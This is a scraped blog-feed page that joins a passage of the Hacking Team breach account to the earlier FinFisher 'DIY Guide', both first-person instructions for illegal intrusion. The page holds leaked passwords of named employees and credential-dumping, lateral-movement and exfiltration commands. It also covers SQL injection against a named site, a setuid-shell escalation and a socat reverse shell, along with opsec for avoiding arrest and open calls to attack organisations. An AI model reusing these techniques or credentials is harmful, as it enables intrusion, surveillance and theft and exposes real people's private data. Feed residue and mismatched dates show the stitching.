0000 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …………….
0010 62 00 65 00 73 00 33 00 32 00 36 00 37 00 38 00 b.e.s.3.2.6.7.8.
0020 21 00 21 00 21 00 00 00 00 00 00 00 00 00 00 00 !.!.!………..

I used proxychains [2] with the socks server on the embedded device and
smbclient [3] to check the password:
proxychains smbclient ‘//192.168.100.51/c$’ -U ‘hackingteam.local/besadmin%bes32678!!!’

It worked! The password for besadmin was still valid, and a local admin. I
used my proxy and metasploit’s psexec_psh [4] to get a meterpreter session.
Then I migrated to a 64 bit process, ran “load kiwi” [5], “creds_wdigest”, and
got a bunch of passwords, including the Domain Admin:

HACKINGTEAM BESAdmin bes32678!!!
HACKINGTEAM Administrator uu8dd8ndd12!
HACKINGTEAM c.pozzi P4ssword <—- lol great sysadmin
HACKINGTEAM m.romeo ioLK/(90
HACKINGTEAM l.guerra 4luc@=.=
HACKINGTEAM d.martinez W4tudul3sp
HACKINGTEAM g.russo GCBr0s0705!
HACKINGTEAM a.scarafile Cd4432996111
HACKINGTEAM r.viscardi Ht2015!
HACKINGTEAM a.mino A!e$$andra
HACKINGTEAM m.bettini Ettore&Bella0314
HACKINGTEAM m.luppi Blackou7
HACKINGTEAM s.gallucci 1S9i8m4o!
HACKINGTEAM d.milan set!dob66
HACKINGTEAM w.furlan Blu3.B3rry!
HACKINGTEAM d.romualdi Rd13136f@#
HACKINGTEAM l.invernizzi L0r3nz0123!
HACKINGTEAM e.ciceri 2O2571&2E
HACKINGTEAM e.rabe erab@4HT!

[1] https://github.com/Neohapsis/creddump7
[2] http://proxychains.sourceforge.net/
[3] https://www.samba.org/
[4] http://ns2.elhacker.net/timofonica/manuales/Manual_de_Metasploit_Unleashed.pdf
[5] https://github.com/gentilkiwi/mimikatz


–[ 11 – Downloading the mail ]————————————————-

With the Domain Admin password, I have access to the email, the heart of the
company. Since with each step I take there’s a chance of being detected, I
start downloading their email before continuing to explore. Powershell makes
it easy [1]. Curiously, I found a bug with Powershell’s date handling. After
downloading the emails, it took me another couple weeks to get access to the
source code and everything else, so I returned every now and then to download
the new emails. The server was Italian, with dates in the format
day/month/year. I used:
-ContentFilter {(Received -ge ’05/06/2015′) -or (Sent -ge ’05/06/2015′)}

with New-MailboxExportRequest to download the new emails (in this case all
mail since June 5). The problem is it says the date is invalid if you
try a day larger than 12 (I imagine because in the US the month comes first
and you can’t have a month above 12). It seems like Microsoft’s engineers only
test their software with their own locale.

[1] http://www.stevieg.org/2010/07/using-the-exchange-2010-sp1-mailbox-export-features-for-mass-exports-to-pst/


–[ 12 – Downloading Files ]—————————————————-

Now that I’d gotten Domain Admin, I started to download file shares using my
proxy and the -Tc option of smbclient, for example:

proxychains smbclient ‘//192.168.1.230/FAE DiskStation’ \
-U ‘HACKINGTEAM/Administrator%uu8dd8ndd12!’ -Tc FAE_DiskStation.tar ‘*’

I downloaded the Amministrazione, FAE DiskStation, and FileServer folders in
the torrent like that.


–[ 13 – Introduction to hacking windows domains ]——————————

Before continuing with the story of the “weones culiaos” (Hacking Team), I
should give some general knowledge for hacking windows networks.


—-[ 13.1 – Lateral Movement ]————————————————-

I’ll give a brief review of the different techniques for spreading withing a
windows network. The techniques for remote execution require the password or
hash of a local admin on the target. By far, the most common way of obtaining
those credentials is using mimikatz [1], especially sekurlsa::logonpasswords
and sekurlsa::msv, on the computers where you already have admin access. The
techniques for “in place” movement also require administrative privileges
(except for runas). The most important tools for privilege escalation are
PowerUp [2], and bypassuac [3].

[1] https://adsecurity.org/?page_id=1821
[2] https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerUp
[3] https://github.com/PowerShellEmpire/Empire/blob/master/data/module_source/privesc/Invoke-BypassUAC.ps1


Remote Movement:

1) psexec

The tried and true method for lateral movement on windows. You can use
psexec [1], winexe [2], metasploit’s psexec_psh [3], Powershell Empire’s
invoke_psexec [4], or the builtin windows command “sc” [5]. For the
metasploit module, powershell empire, and pth-winexe [6], you just need the
hash, not the password. It’s the most universal method (it works on any
windows computer with port 445 open), but it’s also the least stealthy.
Event type 7045 “Service Control Manager” will appear in the event logs. In
my experience, no one has ever noticed during a hack, but it helps the
investigators piece together what the hacker did afterwards.

2) WMI

The most stealthy method. The WMI service is enabled on all windows
computers, but except for servers, the firewall blocks it by default. You
can use wmiexec.py [7], pth-wmis [6] (here’s a demonstration of wmiexec and
pth-wmis [8]), Powershell Empire’s invoke_wmi [9], or the windows builtin
wmic [5]. All except wmic just need the hash.

3) PSRemoting [10]

It’s disabled by default, and I don’t recommend enabling new protocols.
But, if the sysadmin has already enabled it, it’s very convenient,
especially if you use powershell for everything (and you should use
powershell for almost everything, it will change [11] with powershell 5 and
windows 10, but for now powershell makes it easy to do everything in RAM,
avoid AV, and leave a small footprint)

4) Scheduled Tasks

You can execute remote programs with at and schtasks [5]. It works in the
same situations where you could use psexec, and it also leaves a well known
footprint [12].

5) GPO

If all those protocols are disabled or blocked by the firewall, once you’re
Domain Admin, you can use GPO to give users a login script, install an msi,
execute a scheduled task [13], or, like we’ll see with the computer of
Mauro Romeo (one of Hacking Team’s sysadmins), use GPO to enable WMI and
open the firewall.

[1] https://technet.microsoft.com/en-us/sysinternals/psexec.aspx
[2] https://sourceforge.net/projects/winexe/
[3] https://www.rapid7.com/db/modules/exploit/windows/smb/psexec_psh
[4] http://www.powershellempire.com/?page_id=523
[5] http://blog.cobaltstrike.com/2014/04/30/lateral-movement-with-high-latency-cc/
[6] https://github.com/byt3bl33d3r/pth-toolkit
[7] https://github.com/CoreSecurity/impacket/blob/master/examples/wmiexec.py
[8] https://www.trustedsec.com/june-2015/no_psexec_needed/
[9] http://www.powershellempire.com/?page_id=124
[10] http://www.maquinasvirtuales.eu/ejecucion-remota-con-powershell/
[11] https://adsecurity.org/?p=2277
[12] https://www.secureworks.com/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems
[13] https://github.com/PowerShellEmpire/Empire/blob/master/lib/modules/lateral_movement/new_gpo_immediate_task.py


“In place” Movement:

1) Token Stealing

Once you have admin access on a computer, you can use the tokens of the
other users to access resources in the domain. Two tools for doing this are
incognito [1] and the mimikatz token::* commands [2].

2) MS14-068

You can take advantage of a validation bug in Kerberos to generate Domain
Admin tickets [3][4][5].

3) Pass the Hash

If you have a user’s hash, but they’re not logged in, you can use
sekurlsa::pth [2] to get a ticket for the user.

4) Process Injection

Any RAT can inject itself into other processes. For example, the migrate
command in meterpreter and pupy [6], or the psinject [7] command in
powershell empire. You can inject into the process that has the token you
want.

5) runas

This is sometimes very useful since it doesn’t require admin privileges.
The command is part of windows, but if you don’t have a GUI you can use
powershell [8].

[1] https://www.indetectables.net/viewtopic.php?p=211165
[2] https://adsecurity.org/?page_id=1821
[3] https://github.com/bidord/pykek
[4] https://adsecurity.org/?p=676
[5] http://www.hackplayers.com/2014/12/CVE-2014-6324-como-validarse-con-cualquier-usuario-como-admin.html
[6] https://github.com/n1nj4sec/pupy
[7] http://www.powershellempire.com/?page_id=273
[8] https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Invoke-Runas.ps1


—-[ 13.2 – Persistence ]——————————————————

Once you have access, you want to keep it. Really, persistence is only a
challenge for assholes like Hacking Team who target activists and other
individuals. To hack companies, persistence isn’t needed since companies never
sleep. I always use Duqu 2 style “persistence”, executing in RAM on a couple
high-uptime servers. On the off chance that they all reboot at the same time,
I have passwords and a golden ticket [1] as backup access. You can read more
about the different techniques for persistence in windows here [2][3][4]. But
for hacking companies, it’s not needed and it increases the risk of detection.

[1] http://blog.cobaltstrike.com/2014/05/14/meterpreter-kiwi-extension-golden-ticket-howto/
[2] http://www.harmj0y.net/blog/empire/nothing-lasts-forever-persistence-with-empire/
[3] http://www.hexacorn.com/blog/category/autostart-persistence/
[4] https://blog.netspi.com/tag/persistence/


—-[ 13.3 – Internal reconnaissance ]——————————————

The best tool these days for understanding windows networks is Powerview [1].
It’s worth reading everything written by it’s author [2], especially [3], [4],
[5], and [6]. Powershell itself is also quite powerful [7]. As there are still
many windows 2000 and 2003 servers without powershell, you also have to learn
the old school [8], with programs like netview.exe [9] or the windows builtin
“net view”. Other techniques that I like are:

1) Downloading a list of file names

With a Domain Admin account, you can download a list of all filenames in
the network with powerview:

Invoke-ShareFinderThreaded -ExcludedShares IPC$,PRINT$,ADMIN$ |
select-string ‘^(.*) \t-‘ | %{dir -recurse $_.Matches[0].Groups[1] |
select fullname | out-file -append files.txt}

Later, you can read it at your leisure and choose which files to download.

2) Reading email

As we’ve already seen, you can download email with powershell, and it has a
lot of useful information.

3) Reading sharepoint

It’s another place where many businesses store a lot of important
information. It can also be downloaded with powershell [10].

4) Active Directory [11]

It has a lot of useful information about users and computers. Without being
Domain Admin, you can already get a lot of info with powerview and other
tools [12]. After getting Domain Admin, you should export all the AD
information with csvde or another tool.

5) Spy on the employees

One of my favorite hobbies is hunting sysadmins. Spying on Christian Pozzi
(one of Hacking Team’s sysadmins) gave me access to a Nagios server which
gave me access to the rete sviluppo (development network with the source
code of RCS). With a simple combination of Get-Keystrokes and
Get-TimedScreenshot from PowerSploit [13], Do-Exfiltration from nishang
[14], and GPO, you can spy on any employee, or even on the whole domain.

[1] https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView
[2] http://www.harmj0y.net/blog/tag/powerview/
[3] http://www.harmj0y.net/blog/powershell/veil-powerview-a-usage-guide/
[4] http://www.harmj0y.net/blog/redteaming/powerview-2-0/
[5] http://www.harmj0y.net/blog/penetesting/i-hunt-sysadmins/
[6] http://www.slideshare.net/harmj0y/i-have-the-powerview
[7] https://adsecurity.org/?p=2535
[8] https://www.youtube.com/watch?v=rpwrKhgMd7E
[9] https://github.com/mubix/netview
[10] https://blogs.msdn.microsoft.com/rcormier/2013/03/30/how-to-perform-bulk-downloads-of-files-in-sharepoint/
[11] https://adsecurity.org/?page_id=41
[12] http://www.darkoperator.com/?tag=Active+Directory
[13] https://github.com/PowerShellMafia/PowerSploit
[14] https://github.com/samratashok/nishang


–[ 14 – Hunting Sysadmins ]—————————————————-

Reading their documentation about their infrastructure [1], I saw that I was
still missing access to something important – the “Rete Sviluppo”, an isolated
network with the source code for RCS. The sysadmins of a company always have
access to everything, so I searched the computers of Mauro Romeo and Christian
Pozzi to see how they administer the Sviluppo network, and to see if there
were any other interesting systems I should investigate. It was simple to
access their computers, since they were part of the windows domain where I’d
already gotten admin access. Mauro Romeo’s computer didn’t have any ports
open, so I opened the port for WMI [2] and executed meterpreter [3]. In
addition to keylogging and screen scraping with Get-Keystrokes and
Get-TimeScreenshot, I used many /gather/ modules from metasploit, CredMan.ps1
[4], and searched for interesting files [5]. Upon seeing that Pozzi had a
Truecrypt volume, I waited until he’d mounted it and then copied off the
files. Many have made fun of Christian Pozzi’s weak passwords (and of
Christian Pozzi in general, he provides plenty of material [6][7][8][9]). I
included them in the leak as a false clue, and to laugh at him. The reality is
that mimikatz and keyloggers view all passwords equally.

[1] http://hacking.technology/Hacked%20Team/FileServer/FileServer/Hackingteam/InfrastrutturaIT/
[2] http://www.hammer-software.com/wmigphowto.shtml
[3] https://www.trustedsec.com/june-2015/no_psexec_needed/
[4] https://gallery.technet.microsoft.com/scriptcenter/PowerShell-Credentials-d44c3cde
[5] http://pwnwiki.io/#!presence/windows/find_files.md
[6] http://archive.is/TbaPy
[7] http://hacking.technology/Hacked%20Team/c.pozzi/screenshots/
[8] http://hacking.technology/Hacked%20Team/c.pozzi/Desktop/you.txt
[9] http://hacking.technology/Hacked%20Team/c.pozzi/credentials/


–[ 15 – The bridge ]———————————————————–

Within Christian Pozzi’s Truecrypt volume, there was a textfile with many
passwords [1]. One of those was for a Fully Automated Nagios server, which had
access to the Sviluppo network in order to monitor it. I’d found the bridge I
needed. The textfile just had the password to the web interface, but there was
a public code execution exploit [2] (it’s an unauthenticated exploit, but it
requires that at least one user has a session initiated, for which I used the
password from the textfile).

[1] http://hacking.technology/Hacked%20Team/c.pozzi/Truecrypt%20Volume/Login%20HT.txt
[2] http://seclists.org/fulldisclosure/2014/Oct/78


–[ 16 – Reusing and resetting passwords ]————————————–

Reading the emails, I’d seen Daniele Milan granting access to git repos. I
already had his windows password thanks to mimikatz. I tried it on the git
server and it worked. Then I tried sudo and it worked. For the gitlab server
and their twitter account, I used the “forgot my password” function along with
my access to their mail server to reset the passwords.


–[ 17 – Conclusion ]———————————————————–

That’s all it takes to take down a company and stop their human rights abuses.
That’s the beauty and asymmetry of hacking: with 100 hours of work, one person
can undo years of work by a multi-million dollar company. Hacking gives the
underdog a chance to fight and win.

Hacking guides often end with a disclaimer: this information is for
educational purposes only, be an ethical hacker, don’t attack systems you
don’t have permission to, etc. I’ll say the same, but with a more rebellious
conception of “ethical” hacking. Leaking documents, expropriating money from
banks, and working to secure the computers of ordinary people is ethical
hacking. However, most people that call themselves “ethical hackers” just work
to secure those who pay their high consulting fees, who are often those most
deserving to be hacked.

Hacking Team saw themselves as part of a long line of inspired Italian design
[1]. I see Vincenzetti, his company, his cronies in the police, Carabinieri,
and government, as part of a long tradition of Italian fascism. I’d like to
dedicate this guide to the victims of the raid on the Armando Diaz school, and
to all those who have had their blood spilled by Italian fascists.

[1] https://twitter.com/coracurrier/status/618104723263090688


–[ 18 – Contact ]————————————————————–

To send me spear phishing attempts, death threats in Italian [1][2], and to
give me 0days or access inside banks, corporations, governments, etc.

[1] http://andres.delgado.ec/2016/01/15/el-miedo-de-vigilar-a-los-vigilantes/
[2] https://twitter.com/CthulhuSec/status/619459002854977537

only encrypted email please:
https://securityinabox.org/es/thunderbird_usarenigmail
—–BEGIN PGP PUBLIC KEY BLOCK—–

mQENBFVp37MBCACu0rMiDtOtn98NurHUPYyI3Fua+bmF2E7OUihTodv4F/N04KKx
vDZlhKfgeLVSns5oSimBKhv4Z2bzvvc1w/00JH7UTLcZNbt9WGxtLEs+C+jF9j2g
27QIfOJGLFhzYm2GYWIiKr88y95YLJxvrMNmJEDwonTECY68RNaoohjy/TcdWA8x
+fCM4OHxM4AwkqqbaAtqUwAJ3Wxr+Hr/3KV+UNV1lBPlGGVSnV+OA4m8XWaPE73h
VYMVbIkJzOXK9enaXyiGKL8LdOHonz5LaGraRousmiu8JCc6HwLHWJLrkcTI9lP8
Ms3gckaJ30JnPc/qGSaFqvl4pJbx/CK6CwqrABEBAAG0IEhhY2sgQmFjayEgPGhh
Y2tiYWNrQHJpc2V1cC5uZXQ+iQE3BBMBCgAhBQJXAvPFAhsDBQsJCAcDBRUKCQgL
BRYCAwEAAh4BAheAAAoJEDScPRHoqSXQoTwIAI8YFRdTptbyEl6Khk2h8+cr3tac
QdqVNDdp6nbP2rVPW+o3DeTNg0R+87NAlGWPg17VWxsYoa4ZwKHdD/tTNPk0Sldf
cQE+IBfSaO0084d6nvSYTpd6iWBvCgJ1iQQwCq0oTgROzDURvWZ6lwyTZ8XK1KF0
JCloCSnbXB8cCemXnQLZwjGvBVgQyaF49rHYn9+edsudn341oPB+7LK7l8vj5Pys
4eauRd/XzYqxqNzlQ5ea6MZuZZL9PX8eN2obJzGaK4qvxQ31uDh/YiP3MeBzFJX8
X2NYUOYWm3oxiGQohoAn//BVHtk2Xf7hxAY4bbDEQEoDLSPybZEXugzM6gC5AQ0E
VWnfswEIANaqa8fFyiiXYWJVizUsVGbjTTO7WfuNflg4F/q/HQBYfl4ne3edL2Ai
oHOGg0OMNuhNrs56eLRyB/6IjM3TCcfn074HL37eDT0Z9p+rbxPDPFOJAMFYyyjm
n5a6HfmctRzjEXccKFaqlwalhnRP6MRFZGKU6+x1nXbiW8sqGEH0a/VdCR3/CY5F
Pbvmhh894wOzivUlP86TwjWGxLu1kHFo7JDgp8YkRGsXv0mvFav70QXtHllxOAy9
WlBP72gPyiWQ/fSUuoM+WDrMZZ9ETt0j3Uwx0Wo42ZoOXmbAd2jgJXSI9+9e4YUo
jYYjoU4ZuX77iM3+VWW1J1xJujOXJ/sAEQEAAYkBHwQYAQIACQUCVWnfswIbDAAK
CRA0nD0R6Kkl0ArYB/47LnABkz/t6M1PwOFvDN3e2JNgS1QV2YpBdog1hQj6RiEA
OoeQKXTEYaymUwYXadSj7oCFRSyhYRvSMb4GZBa1bo8RxrrTVa0vZk8uA0DB1ZZR
LWvSR7nwcUkZglZCq3Jpmsy1VLjCrMC4hXnFeGi9AX1fh28RYHudh8pecnGKh+Gi
JKp0XtOqGF5NH/Zdgz6t+Z8U++vuwWQaubMJTRdMTGhaRv+jIzKOiO9YtPNamHRq
Mf2vA3oqf22vgWQbK1MOK/4Tp6MGg/VR2SaKAsqyAZC7l5TeoSPN5HdEgA7u5GpB
D0lLGUSkx24yD1sIAGEZ4B57VZNBS0az8HoQeF0k
=E5+y
—–END PGP PUBLIC KEY BLOCK—–



If not you, who? If not now, when?
_ _ _ ____ _ _
| | | | __ _ ___| | __ | __ ) __ _ ___| | _| |
| |_| |/ _` |/ __| |/ / | _ \ / _` |/ __| |/ / |
| _ | (_| | (__| < | |_) | (_| | (__| <|_|
|_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_)

]]>
Phineas Fisher https://hack4living.com/2012/04/27/270/ Fri, 27 Apr 2012 23:05:48 +0000 https://hack4living.com/?p=270
A DIY Guide for those without the patience to wait for whistleblowers


--[ 1 ]-- Introduction

I'm not writing this to brag about what an 31337 h4x0r I am and what m4d sk1llz
it took to 0wn Gamma. I'm writing this to demystify hacking, to show how simple
it is, and to hopefully inform and inspire you to go out and hack shit. If you
have no experience with programming or hacking, some of the text below might
look like a foreign language. Check the resources section at the end to help you
get started. And trust me, once you've learned the basics you'll realize this
really is easier than filing a FOIA request.


--[ 2 ]-- Staying Safe

This is illegal, so you'll need to take same basic precautions:

1) Make a hidden encrypted volume with Truecrypt 7.1a [0]
2) Inside the encrypted volume install Whonix [1]
3) (Optional) While just having everything go over Tor thanks to Whonix is
probably sufficient, it's better to not use an internet connection connected
to your name or address. A cantenna, aircrack, and reaver can come in handy
here.

[0] https://truecrypt.ch/downloads/
[1] https://www.whonix.org/wiki/Download#Install_Whonix

As long as you follow common sense like never do anything hacking related
outside of Whonix, never do any of your normal computer usage inside Whonix,
never mention any information about your real life when talking with other
hackers, and never brag about your illegal hacking exploits to friends in real
life, then you can pretty much do whatever you want with no fear of being v&.

NOTE: I do NOT recommend actually hacking directly over Tor. While Tor is usable
for some things like web browsing, when it comes to using hacking tools like
nmap, sqlmap, and nikto that are making thousands of requests, they will run
very slowly over Tor. Not to mention that you'll want a public IP address to
receive connect back shells. I recommend using servers you've hacked or a VPS
paid with bitcoin to hack from. That way only the low bandwidth text interface
between you and the server is over Tor. All the commands you're running will
have a nice fast connection to your target.


--[ 3 ]-- Mapping out the target

Basically I just repeatedly use fierce [0], whois lookups on IP addresses and
domain names, and reverse whois lookups to find all IP address space and domain
names associated with an organization.

[0] http://ha.ckers.org/fierce/

For an example let's take Blackwater. We start out knowing their homepage is at
academi.com. Running fierce.pl -dns academi.com we find the subdomains:
67.238.84.228 email.academi.com
67.238.84.242 extranet.academi.com
67.238.84.240 mail.academi.com
67.238.84.230 secure.academi.com
67.238.84.227 vault.academi.com
54.243.51.249 www.academi.com

Now we do whois lookups and find the homepage of www.academi.com is hosted on
Amazon Web Service, while the other IPs are in the range:
NetRange: 67.238.84.224 - 67.238.84.255
CIDR: 67.238.84.224/27
CustName: Blackwater USA
Address: 850 Puddin Ridge Rd

Doing a whois lookup on academi.com reveals it's also registered to the same
address, so we'll use that as a string to search with for the reverse whois
lookups. As far as I know all the actual reverse whois lookup services cost
money, so I just cheat with google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup
"850 Puddin Ridge Rd" inurl:domaintools

Now run fierce.pl -range on the IP ranges you find to lookup dns names, and
fierce.pl -dns on the domain names to find subdomains and IP addresses. Do more
whois lookups and repeat the process until you've found everything.

Also just google the organization and browse around its websites. For example on
academi.com we find links to a careers portal, an online store, and an employee
resources page, so now we have some more:
54.236.143.203 careers.academi.com
67.132.195.12 academiproshop.com
67.238.84.236 te.academi.com
67.238.84.238 property.academi.com
67.238.84.241 teams.academi.com

If you repeat the whois lookups and such you'll find academiproshop.com seems to
not be hosted or maintained by Blackwater, so scratch that off the list of
interesting IPs/domains.

In the case of FinFisher what led me to the vulnerable finsupport.finfisher.com
was simply a whois lookup of finfisher.com which found it registered to the name
"FinFisher GmbH". Googling for:
"FinFisher GmbH" inurl:domaintools
finds gamma-international.de, which redirects to finsupport.finfisher.com

...so now you've got some idea how I map out a target.
This is actually one of the most important parts, as the larger the attack
surface that you are able to map out, the easier it will be to find a hole
somewhere in it.


--[ 4 ]-- Scanning & Exploiting

Scan all the IP ranges you found with nmap to find all services running. Aside
from a standard port scan, scanning for SNMP is underrated.

Now for each service you find running:

1) Is it exposing something it shouldn't? Sometimes companies will have services
running that require no authentication and just assume it's safe because the url
or IP to access it isn't public. Maybe fierce found a git subdomain and you can
go to git.companyname.come/gitweb/ and browse their source code.

2) Is it horribly misconfigured? Maybe they have an ftp server that allows
anonymous read or write access to an important directory. Maybe they have a
database server with a blank admin password (lol stratfor). Maybe their embedded
devices (VOIP boxes, IP Cameras, routers etc) are using the manufacturer's
default password.

3) Is it running an old version of software vulnerable to a public exploit?


Webservers deserve their own category. For any webservers, including ones nmap
will often find running on nonstandard ports, I usually:

1) Browse them. Especially on subdomains that fierce finds which aren't intended
for public viewing like test.company.com or dev.company.com you'll often find
interesting stuff just by looking at them.

2) Run nikto [0]. This will check for things like webserver/.svn/,
webserver/backup/, webserver/phpinfo.php, and a few thousand other common
mistakes and misconfigurations.

3) Identify what software is being used on the website. WhatWeb is useful [1]

4) Depending on what software the website is running, use more specific tools
like wpscan [2], CMS-Explorer [3], and Joomscan [4].

First try that against all services to see if any have a misconfiguration,
publicly known vulnerability, or other easy way in. If not, it's time to move
on to finding a new vulnerability:

5) Custom coded web apps are more fertile ground for bugs than large widely used
projects, so try those first. I use ZAP [5], and some combination of its
automated tests along with manually poking around with the help of its
intercepting proxy.

6) For the non-custom software they're running, get a copy to look at. If it's
free software you can just download it. If it's proprietary you can usually
pirate it. If it's proprietary and obscure enough that you can't pirate it you
can buy it (lame) or find other sites running the same software using google,
find one that's easier to hack, and get a copy from them.

[0] http://www.cirt.net/nikto2
[1] http://www.morningstarsecurity.com/research/whatweb
[2] http://wpscan.org/
[3] https://code.google.com/p/cms-explorer/
[4] http://sourceforge.net/projects/joomscan/
[5] https://code.google.com/p/zaproxy/


For finsupport.finfisher.com the process was:

* Start nikto running in the background.

* Visit the website. See nothing but a login page. Quickly check for sqli in the
login form.

* See if WhatWeb knows anything about what software the site is running.

* WhatWeb doesn't recognize it, so the next question I want answered is if this
is a custom website by Gamma, or if there are other websites using the same
software.

* I view the page source to find a URL I can search on (index.php isn't
exactly unique to this software). I pick Scripts/scripts.js.php, and google:
allinurl:"Scripts/scripts.js.php"

* I find there's a handful of other sites using the same software, all coded by
the same small webdesign firm. It looks like each site is custom coded but
they share a lot of code. So I hack a couple of them to get a collection of
code written by the webdesign firm.

At this point I can see the news stories that journalists will write to drum
up views: "In a sophisticated, multi-step attack, hackers first compromised a
web design firm in order to acquire confidential data that would aid them in
attacking Gamma Group..."

But it's really quite easy, done almost on autopilot once you get the hang of
it. It took all of a couple minutes to:

* google allinurl:"Scripts/scripts.js.php" and find the other sites

* Notice they're all sql injectable in the first url parameter I try.

* Realize they're running Apache ModSecurity so I need to use sqlmap [0] with
the option --tamper='tamper/modsecurityversioned.py'

* Acquire the admin login information, login and upload a php shell [1] (the
check for allowable file extensions was done client side in javascript), and
download the website's source code.

[0] http://sqlmap.org/
[1] https://epinna.github.io/Weevely/

Looking through the source code they might as well have named it Damn Vulnerable
Web App v2 [0]. It's got sqli, LFI, file upload checks done client side in
javascript, and if you're unauthenticated the admin page just sends you back to
the login page with a Location header, but you can have your intercepting proxy
filter the Location header out and access it just fine.

[0] http://www.dvwa.co.uk/

Heading back over to the finsupport site, the admin /BackOffice/ page returns
403 Forbidden, and I'm having some issues with the LFI, so I switch to using the
sqli (it's nice to have a dozen options to choose from). The other sites by the
web designer all had an injectable print.php, so some quick requests to:
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
reveal that finsupport also has print.php and it is injectable. And it's
database admin! For MySQL this means you can read and write files. It turns out
the site has magicquotes enabled, so I can't use INTO OUTFILE to write files.
But I can use a short script that uses sqlmap --file-read to get the php source
for a URL, and a normal web request to get the HTML, and then finds files
included or required in the php source, and finds php files linked in the HTML,
to recursively download the source to the whole site.

Looking through the source, I see customers can attach a file to their support
tickets, and there's no check on the file extension. So I pick a username and
password out of the customer database, create a support request with a php shell
attached, and I'm in!


--[ 5 ]-- (fail at) Escalating

___________
< got r00t? >
-----------
\ ^__^
\ (oo)\_______
(__)\ )\/\
||----w |
|| ||
^^^^^^^^^^^^^^^^

Root over 50% of linux servers you encounter in the wild with two easy scripts,
Linux_Exploit_Suggester [0], and unix-privesc-check [1].

[0] https://github.com/PenturaLabs/Linux_Exploit_Suggester
[1] https://code.google.com/p/unix-privesc-check/

finsupport was running the latest version of Debian with no local root exploits,
but unix-privesc-check returned:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user
www-data can write to /etc/cron.hourly/mgmtlicensestatus
WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data
can write to /etc/cron.hourly/webalizer

so I add to /etc/cron.hourly/webalizer:
chown root:root /path/to/my_setuid_shell
chmod 04755 /path/to/my_setuid_shell

wait an hour, and ....nothing. Turns out that while the cron process is running
it doesn't seem to be actually running cron jobs. Looking in the webalizer
directory shows it didn't update stats the previous month. Apparently after
updating the timezone cron will sometimes run at the wrong time or sometimes not
run at all and you need to restart cron after changing the timezone. ls -l
/etc/localtime shows the timezone got updated June 6, the same time webalizer
stopped recording stats, so that's probably the issue. At any rate, the only
thing this server does is host the website, so I already have access to
everything interesting on it. Root wouldn't get much of anything new, so I move
on to the rest of the network.


--[ 6 ]-- Pivoting

The next step is to look around the local network of the box you hacked. This
is pretty much the same as the first Scanning & Exploiting step, except that
from behind the firewall many more interesting services will be exposed. A
tarball containing a statically linked copy of nmap and all its scripts that you
can upload and run on any box is very useful for this. The various nfs-* and
especially smb-* scripts nmap has will be extremely useful.

The only interesting thing I could get on finsupport's local network was another
webserver serving up a folder called 'qateam' containing their mobile malware.


--[ 7 ]-- Have Fun

Once you're in their networks, the real fun starts. Just use your imagination.
While I titled this a guide for wannabe whistleblowers, there's no reason to
limit yourself to leaking documents. My original plan was to:
1) Hack Gamma and obtain a copy of the FinSpy server software
2) Find vulnerabilities in FinSpy server.
3) Scan the internet for, and hack, all FinSpy C&C servers.
4) Identify the groups running them.
5) Use the C&C server to upload and run a program on all targets telling them
who was spying on them.
6) Use the C&C server to uninstall FinFisher on all targets.
7) Join the former C&C servers into a botnet to DDoS Gamma Group.

It was only after failing to fully hack Gamma and ending up with some
interesting documents but no copy of the FinSpy server software that I had to
make due with the far less lulzy backup plan of leaking their stuff while
mocking them on twitter.
Point your GPUs at FinSpy-PC+Mobile-2012-07-12-Final.zip and crack the password
already so I can move on to step 2!


--[ 8 ]-- Other Methods

The general method I outlined above of scan, find vulnerabilities, and exploit
is just one way to hack, probably better suited to those with a background in
programming. There's no one right way, and any method that works is as good as
any other. The other main ways that I'll state without going into detail are:

1) Exploits in web browers, java, flash, or microsoft office, combined with
emailing employees with a convincing message to get them to open the link or
attachment, or hacking a web site frequented by the employees and adding the
browser/java/flash exploit to that.
This is the method used by most of the government hacking groups, but you don't
need to be a government with millions to spend on 0day research or subscriptions
to FinSploit or VUPEN to pull it off. You can get a quality russian exploit kit
for a couple thousand, and rent access to one for much less. There's also
metasploit browser autopwn, but you'll probably have better luck with no
exploits and a fake flash updater prompt.

2) Taking advantage of the fact that people are nice, trusting, and helpful 95%
of the time.
The infosec industry invented a term to make this sound like some sort of
science: "Social Engineering". This is probably the way to go if you don't know
too much about computers, and it really is all it takes to be a successful
hacker [0].

[0] https://www.youtube.com/watch?v=DB6ywr9fngU


--[ 9 ]-- Resources

Links:

* https://www.pentesterlab.com/exercises/
* http://overthewire.org/wargames/
* http://www.hackthissite.org/
* http://smashthestack.org/
* http://www.win.tue.nl/~aeb/linux/hh/hh.html
* http://www.phrack.com/
* http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot
* http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash
* https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/
* https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers
(all his other blog posts are great too)
* https://www.corelan.be/ (start at Exploit writing tutorial part 1)
* http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/
One trick it leaves out is that on most systems the apache access log is
readable only by root, but you can still include from /proc/self/fd/10 or
whatever fd apache opened it as. It would also be more useful if it mentioned
what versions of php the various tricks were fixed in.
* http://www.dest-unreach.org/socat/
Get usable reverse shells with a statically linked copy of socat to drop on
your target and:
target$ socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp-listen:PORTNUM
host$ socat file:`tty`,raw,echo=0 tcp-connect:localhost:PORTNUM
It's also useful for setting up weird pivots and all kinds of other stuff.

Books:

* The Web Application Hacker's Handbook
* Hacking: The Art of Exploitation
* The Database Hacker's Handbook
* The Art of Software Security Assessment
* A Bug Hunter's Diary
* Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier
* TCP/IP Illustrated

Aside from the hacking specific stuff almost anything useful to a system
administrator for setting up and administering networks will also be useful for
exploring them. This includes familiarity with the windows command prompt and unix
shell, basic scripting skills, knowledge of ldap, kerberos, active directory,
networking, etc.


--[ 10 ]-- Outro

